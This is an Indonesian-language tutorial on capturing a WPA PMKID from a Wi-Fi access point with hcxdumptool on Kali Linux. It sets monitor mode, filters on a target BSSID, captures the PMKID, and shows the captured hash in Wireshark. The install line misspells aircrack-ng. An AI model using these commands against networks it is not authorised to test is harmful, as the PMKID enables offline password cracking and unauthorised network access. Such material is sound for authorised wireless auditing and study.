Capture PMKID Menggunakan Hcxdumptool v7.0.0 di Kali Linux

  Persyaratan:

•  Sistem operasi Kali Linux
• Koneksi internet 
• Hcxdumptool
• Aircrack-ng
• Wireshark 
• Adapter Wi-Fi yang support mode monitor dan packet injection. 
• Target Wi-Fi yang mendukung PMKID

Instalasi:

$ sudo apt-get update

$ sudo apt-get install hcxdumptool aicrack-ng wireshark

Langkah-Langkah: 

1. Masuk sebagai user root:

$ sudo -i   

2. Lihat interface yang tersedia:

$ iw dev 

Dari output gambar di atas, saya hanya memiliki satu interface, yaitu wlan0.

3. Aktifkan mode monitor:

$ hcxdumptool -m wlan0 

4. Cari target Wi-Fi:

$ airodump-ng wlan0 

5. Pada kasus ini saya menargetkan ESSID TESTING. Catat BSSID 48:A9:8A:2C:FC:E3 dan channel yang digunakan: 11.

6. Buat BPF (Berkeley Packet Filter):

 $ hcxdumptool --bpfc="wlan addr3 48A98A2CFCE3" > filter.bpf

7. Capture PMKID:

$ hcxdumptool -i wlan0 -w capture.pcapng -c 11a --bpf=filter.bpf --rds=2 --exitoneapol=1

Keterangan:

• -i : Nama interface yang akan digunakan.
• -w : Nama file keluaran dalam format .pcapng.
• -c : Channel tempat AP target beroperasi.
• --bpf=<file> : File BPF (Berkeley Packet Filter) dalam format tcpdump decimal numbers, digunakan untuk memfilter paket yang ditangkap.
• --rds=<digit> : Mengaktifkan real-time display. Contoh: --rds=2, mode 2 menampilkan seluruh AP yang terdeteksi di berbagai channel serta CLIENT yang berinteraksi (ditandai sesuai penerimaan frame seperti M1, M1M2 atau PMKID).
• --exitoneapol=<type> : Keluar saat EAPOL pertama ditemukan sesuai type. Contoh: --exitoneapol=1 berarti keluar pada PMKID (bit 1).

8. Buka file capture.pcapng menggunakan Wireshark:

$ wireshark  capture.pcapng

9. Dibagin Apply a Display Filter ketikkan eapol.

 10. Fokus pada kolom Info, cari pesan bertipe Key (Message 1 of 4). Klik 802.1X Authentication -> WPA Key Data -> Tag.

Dari output gambar di atas, saya sudah berhasil mendapatkan PMKID: 95bf0f711e7062a55046338c2854539a.